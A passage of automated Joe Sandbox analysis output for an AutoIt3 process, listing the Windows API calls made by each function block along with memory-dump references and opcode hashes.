                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: c2138b66ae9223c131a416952f864ef50d9bc0e0bc78e3c6bf6dc1e54ad72293
                                      • Instruction ID: da3fe343871cce9ddf82b20fc808a041186fa1c1e7c671b8c8d597a305f91f79
                                      • Opcode Fuzzy Hash: c2138b66ae9223c131a416952f864ef50d9bc0e0bc78e3c6bf6dc1e54ad72293
                                      • Instruction Fuzzy Hash: DE115A3A901218FFEB11DF95CD84E9DBBB8FB48710F204092E904B7290D6716E14DB90
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 008016B4
                                      • GetClientRect.USER32(?,?), ref: 0083B93C
                                      • GetCursorPos.USER32(?), ref: 0083B946
                                      • ScreenToClient.USER32(?,?), ref: 0083B951
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: 2378f6967fcebc8cb091238cd890ebec0a8e3fb9bd19da8c9a753500531369a0
                                      • Instruction ID: 16c08a6d9e43dfc4db646c6befc159a46b24470024cb026c2e6f86addfd6dda4
                                      • Opcode Fuzzy Hash: 2378f6967fcebc8cb091238cd890ebec0a8e3fb9bd19da8c9a753500531369a0
                                      • Instruction Fuzzy Hash: 98114375A01119AFCF40EFA8CC89DBE77B8FB14310F040456EA21E7180C331AA51CFA6
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                      • GetStockObject.GDI32(00000011), ref: 00802163
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: bd32d16145b945f4ff5e0ea79ce355a5a16f743b942b0fbf63a649ffaebf231a
                                      • Instruction ID: 97bafeaceb7ffd6c8b57657790b7429dc2942c3e268889368839ed3620a7161b
                                      • Opcode Fuzzy Hash: bd32d16145b945f4ff5e0ea79ce355a5a16f743b942b0fbf63a649ffaebf231a
                                      • Instruction Fuzzy Hash: E5118B72201209BFDB425F949C88EEABB69FF58364F040112FB1492090D771AC61AFA0
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 0086195E
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 00861983
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 0086198D
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 008619C0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: fa744c5d0d3bbd0e662290866883722822a0f2952094515547fcffa97751d345
                                      • Instruction ID: 7c31077b72ce5e2611e1bc4c312ab8574cf5b0695413a68011028bd60d169593
                                      • Opcode Fuzzy Hash: fa744c5d0d3bbd0e662290866883722822a0f2952094515547fcffa97751d345
                                      • Instruction Fuzzy Hash: 61114831D0052DDBCF00AFA4D958BEEBF78FF08701F4A4146E980F2242CB3096908B95
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0088E1EA
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0088E201
                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0088E216
                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0088E234
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 826d05b9b07daf1960701d59c768e2d86fd3482103cbc5bcc6fbe344f1c8b777
                                      • Instruction ID: 23bfbc35cc84557c9aadc970eedf6bb6384bb6e927c3f78f57ae06cc456ac70e
                                      • Opcode Fuzzy Hash: 826d05b9b07daf1960701d59c768e2d86fd3482103cbc5bcc6fbe344f1c8b777
                                      • Instruction Fuzzy Hash: 0D115EB52053099BE330AF51DD08F93BBBCFF01B18F10855AB656D6450D7B0F5049BA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: dd3fe2cb4b21c3e44824553f3af6782d665a3bb02fbf7f92cfdcb3406181bb85
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: C2014BB204814EBBCF225E88CC418EE3F62FB99355F588515FE1998131D236C9B1ABD1
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0088B956
                                      • ScreenToClient.USER32(?,?), ref: 0088B96E
                                      • ScreenToClient.USER32(?,?), ref: 0088B992
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088B9AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: 560c5f9a57e2eaade81789f2ee855cea508130a448ec9acefbdd09443035c8b1
                                      • Instruction ID: 3fca412b4bc8f74a5c3787f0ab5e3696cf036c1025ebf8640715496b4c7e08c7
                                      • Opcode Fuzzy Hash: 560c5f9a57e2eaade81789f2ee855cea508130a448ec9acefbdd09443035c8b1
                                      • Instruction Fuzzy Hash: DD1143B9D00209EFDB41DF98C984AEEBBF9FF58310F104156E914E3610D735AA658F50
                                      APIs
                                      • _memset.LIBCMT ref: 0088BCB6
                                      • _memset.LIBCMT ref: 0088BCC5
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C8F20,008C8F64), ref: 0088BCF4
                                      • CloseHandle.KERNEL32 ref: 0088BD06
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 34f8c95e8de1fe7242996f7d5251b6cd7daed02bdb7627e5fab7b20e4da8b731
                                      • Instruction ID: 8bc57549035042269ff9a724e3c008ea8d471750d5c38713a438ea334c780c6a
                                      • Opcode Fuzzy Hash: 34f8c95e8de1fe7242996f7d5251b6cd7daed02bdb7627e5fab7b20e4da8b731
                                      • Instruction Fuzzy Hash: BAF05EB2690314FFE2503765AC05FBB3A6DFB08751F040429BA48E51A2DF75881097B9
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 008671A1
                                        • Part of subcall function 00867C7F: _memset.LIBCMT ref: 00867CB4
                                      • _memmove.LIBCMT ref: 008671C4
                                      • _memset.LIBCMT ref: 008671D1
                                      • LeaveCriticalSection.KERNEL32(?), ref: 008671E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 9a9ab180ad474fcd870ef84adddd11bf718d895e79cb24d0952d78329db6ca26
                                      • Instruction ID: ae90e3408c1f1403e52484e4ca69d5c48cccea3874a08485c26fc98e7085b6ea
                                      • Opcode Fuzzy Hash: 9a9ab180ad474fcd870ef84adddd11bf718d895e79cb24d0952d78329db6ca26
                                      • Instruction Fuzzy Hash: 4EF05436100110AFCF416F59EC85E4ABB29FF45320F08C051FE089E21ACB31A951DFB5
                                      APIs
                                        • Part of subcall function 008016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801738
                                        • Part of subcall function 008016CF: BeginPath.GDI32(?), ref: 0080174F
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801778
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0088C3E8
                                      • LineTo.GDI32(00000000,?,?), ref: 0088C3F5
                                      • EndPath.GDI32(00000000), ref: 0088C405
                                      • StrokePath.GDI32(00000000), ref: 0088C413
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: e694136569ff394c7df59cfd63d5c316da5ae2c8fbda07bf6bcdff3b5df3371c
                                      • Instruction ID: ddc79990d57db283a672420edff634b1bcba5badab22288edfdeae4787ebc5c7
                                      • Opcode Fuzzy Hash: e694136569ff394c7df59cfd63d5c316da5ae2c8fbda07bf6bcdff3b5df3371c
                                      • Instruction Fuzzy Hash: 4CF05E32005659BADB127F54AC0EFDE3F69BF05311F088011FA61A11E187B55551DFA9
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0085AA6F
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0085AA82
                                      • GetCurrentThreadId.KERNEL32 ref: 0085AA89
                                      • AttachThreadInput.USER32(00000000), ref: 0085AA90
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 58ce768cb41e2a542382da8ada63cafecea70a33bc7ffe786bf737409beac00a
                                      • Instruction ID: d51cdcf266681b4c739d8a96af59cfc161676030fcc0e7ee526ccac169e2dbab
                                      • Opcode Fuzzy Hash: 58ce768cb41e2a542382da8ada63cafecea70a33bc7ffe786bf737409beac00a
                                      • Instruction Fuzzy Hash: 9EE01532541328BADB226BA2DD0CEEB3E1CFF217A2F048112B90994060C7718554CBA0
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0080260D
                                      • SetTextColor.GDI32(?,000000FF), ref: 00802617
                                      • SetBkMode.GDI32(?,00000001), ref: 0080262C
                                      • GetStockObject.GDI32(00000005), ref: 00802634
                                      • GetWindowDC.USER32(?,00000000), ref: 0083C1C4
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083C1D1
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0083C1EA
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0083C203
                                      • GetPixel.GDI32(00000000,?,?), ref: 0083C223
                                      • ReleaseDC.USER32(?,00000000), ref: 0083C22E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 83f975f840aba6694d7e0d770d4a879dc5dd0edf9309acd0c445b3f87069848d
                                      • Instruction ID: b718d1cb4c57fd842bf778c98acb46001835ae257990fd126f0f1764acc1f425
                                      • Opcode Fuzzy Hash: 83f975f840aba6694d7e0d770d4a879dc5dd0edf9309acd0c445b3f87069848d
                                      • Instruction Fuzzy Hash: F5E0C932604244AEDB616FA8AC4DBD87B11FB55332F188367FA69980E187724990DF51
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00859339
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00858F04), ref: 00859340
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00858F04), ref: 0085934D
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00858F04), ref: 00859354
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 83aa4964d33a942347341c8d78ceb00e609499f918b1b5ea6b432156c42b01c3
                                      • Instruction ID: b982b085ac47de2d1ce82bda47f910464eea1bd5b2a8730a2502a84ab7be47aa
                                      • Opcode Fuzzy Hash: 83aa4964d33a942347341c8d78ceb00e609499f918b1b5ea6b432156c42b01c3
                                      • Instruction Fuzzy Hash: DEE04F32601211DFD7202FB29D0DB967B6CFF50792F184859E685C9090E6349444CB50
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00840679
                                      • GetDC.USER32(00000000), ref: 00840683
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008406A3
                                      • ReleaseDC.USER32(?), ref: 008406C4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: b383ef4a26c8b4c16fb2823baddc162c5a0963fdac9c97df3e68cfd259624413
                                      • Instruction ID: d12858ecc13c64d0ea8efca259884630ca0bf0d78b4de9afc5359d9a3f4eb0d5
                                      • Opcode Fuzzy Hash: b383ef4a26c8b4c16fb2823baddc162c5a0963fdac9c97df3e68cfd259624413
                                      • Instruction Fuzzy Hash: 35E0E5B2800308EFCB42AFA4D808A5D7BB1FFA8354F15800AF95AE7250CB7895519F50
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 0084068D
                                      • GetDC.USER32(00000000), ref: 00840697
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008406A3
                                      • ReleaseDC.USER32(?), ref: 008406C4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: a081f809de0cc52085ebf794c75c659f34a1921a191a836afbb8cc21838f9784
                                      • Instruction ID: bc85d0d3d777ef9ac8a1b092f1850b7c88dc528b6a0a1235067811846ddd2f06
                                      • Opcode Fuzzy Hash: a081f809de0cc52085ebf794c75c659f34a1921a191a836afbb8cc21838f9784
                                      • Instruction Fuzzy Hash: 02E0E5B2800204AFCB42AF64D80865D7BA1FF98350F148006F959E7250CB7895518F50
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00825FCD
                                        • Part of subcall function 00829BF4: GetLastError.KERNEL32(?,00821003,00828D5D,008259C3,?,?,00821003,?), ref: 00829BF6
                                        • Part of subcall function 00829BF4: __calloc_crt.LIBCMT ref: 00829C17
                                        • Part of subcall function 00829BF4: __initptd.LIBCMT ref: 00829C39
                                        • Part of subcall function 00829BF4: GetCurrentThreadId.KERNEL32 ref: 00829C40
                                        • Part of subcall function 00829BF4: SetLastError.KERNEL32(00000000,00821003,00828D5D,008259C3,?,?,00821003,?), ref: 00829C58
                                      • CloseHandle.KERNEL32(?,?,00825FAC), ref: 00825FE1
                                      • __freeptd.LIBCMT ref: 00825FE8
                                      • ExitThread.KERNEL32 ref: 00825FF0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                      • String ID:
                                      • API String ID: 4169687693-0
                                      • Opcode ID: e574edb217cbadb8887efe12b8e5c83d65fd4db684a588f8cae4c2b414ca0d1c
                                      • Instruction ID: 1cf1df1dfd3ae23126c542e6cb4411ada3c736feb6a68bc77bd426b1353741ec
                                      • Opcode Fuzzy Hash: e574edb217cbadb8887efe12b8e5c83d65fd4db684a588f8cae4c2b414ca0d1c
                                      • Instruction Fuzzy Hash: C2D05232002E709BC6322728B90AA2A2210FF00B31F084206F1A9E52E09B3089828A82
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0085C057
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 2238bdde1a9e492a1a49d135b76653da2eddb0f84299fd7e78f36e79b538e108
                                      • Instruction ID: d6302c2651fbbb109547e304e4520367038577e39868d0e993457c9f4bd6595e
                                      • Opcode Fuzzy Hash: 2238bdde1a9e492a1a49d135b76653da2eddb0f84299fd7e78f36e79b538e108
                                      • Instruction Fuzzy Hash: 7B914670200705AFDB24DF68C884A6ABBE4FF49705F24846DF94ADB691DB71E849CF50
                                      APIs
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • __wcsnicmp.LIBCMT ref: 0086B670
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0086B739
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: 1095a154aa4a40bcabffa47e32005461f9a11224652f8192c9f25d1509c889b7
                                      • Instruction ID: 24c5418f054482f396d62a56a9574dc9bf7706844b4dc3155ffaca5045517fd8
